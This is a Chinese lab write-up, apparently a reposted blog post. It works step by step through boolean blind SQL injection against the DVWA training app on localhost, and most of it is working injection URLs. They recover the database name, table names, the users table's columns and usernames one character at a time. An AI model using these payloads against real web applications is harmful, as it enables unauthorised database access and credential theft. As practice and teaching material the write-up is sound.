首页 > 数据库> > sql-injection-Blind-low-level-notes-SQL注入-dvwa靶场

sql-injection-Blind-low-level-notes-SQL注入-dvwa靶场

2021-03-16 18:32:27 作者：互联网

盲注

猜数据库长度

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3' and LENGTH(DATABASE())=4 --+&Submit=Submit#
User ID exists in the database.
得出database()长度为4

猜解数据库的名字

SELECT ASCII('d');#100
SELECT ASCII('v');#118
SELECT ASCII('w');#119
SELECT ASCII('a');#97

SELECT SUBSTR(DATABASE(),1,1);#d
SELECT SUBSTR(DATABASE(),2,1);#v
SELECT SUBSTR(DATABASE(),3,1);#w
SELECT SUBSTR(DATABASE(),4,1);#a

SELECT ASCII('d')=100;#1
SELECT ASCII('v')=118;#1
SELECT ASCII('w')=119;#1
SELECT ASCII('a')=97;#1

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=99--+&Submit=Submit#
User ID is MISSING from the database.

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=100--+&Submit=Submit#
User ID exists in the database.

得出database()第一个字段是'd'
同理得出第二个字段是'v'...三字段'w'...四字段'a'
得出数据库名database() = 'dvwa'

猜解dvwa数据库中的表个数

SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=1;#0
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2;#1
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3;#0

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2)--+&Submit=Submit#
#--> User ID exists in the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3)--+&Submit=Submit#
#--> User ID is MISSING from the database.
得出dvwa数据库中的表数量为2

猜解dvwa数据库中第一张表表名的第一个字符

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=102)--+&Submit=Submit#
#--> User ID is MISSING from the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=103)--+&Submit=Submit#
#--> User ID exists in the database.
得到第一个字符为g

同理得第二个字符

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),2,1))=117)--+&Submit=Submit#
#--> User ID exists in the database.
得到第一个字符为u

同理可得表名：guestbook、第二张表：users

猜解dvwa数据库中的users表的字段数

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name= 'users' AND TABLE_SCHEMA='dvwa')=8)--+&Submit=Submit#
#--> User ID exists in the database.
得到：users表一共有８个字段

猜解dvwa数据库中的users表的具体字段

#--> limit 6,1 选到user字段
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND(ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),1,1))=117)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),2,1))=115)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),3,1))=101)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),4,1))=114)--+&Submit=Submit#
#--> User ID exists in the database.
SELECT ASCII('u');#117
SELECT ASCII('s');#115
SELECT ASCII('e');#101
SELECT ASCII('r');#114

#--> 得到users表的字段user

同上得到users表的字段password

猜解users表中的user字段值

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND length(substr((select user from users limit 0,1),1))=5--+&Submit=Submit#
User ID exists in the database.user字段中第1个字段值的字符长度=5

SELECT ASCII('a');#97
SELECT ASCII('d');#100
SELECT ASCII('m');#109
SELECT ASCII('i');#105
SELECT ASCII('n');#110
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),1,1))=97))--+&Submit=Submit#
#第一个字段值的第一个字符a

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),2,1))=100))--+&Submit=Submit#
#第一个字段值的第二个字符d

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),3,1))=109))--+&Submit=Submit#
#第一个字段值的第三个字符m

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),4,1))=105))--+&Submit=Submit#
#第一个字段值的第四个字符i

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),5,1))=110))--+&Submit=Submit#
#第一个字段值的第五个字符n

组合得到：admin
同理可得user字段第二个值(SELECT USER FROM users LIMIT 1,1），再尝试得到：Gordonb

同上，猜解users表中的password字段值。

结束。

标签：Blind,users,level,notes,dvwa,Submit,ASCII,SELECT,schema
来源： https://www.cnblogs.com/codeace/p/14545148.html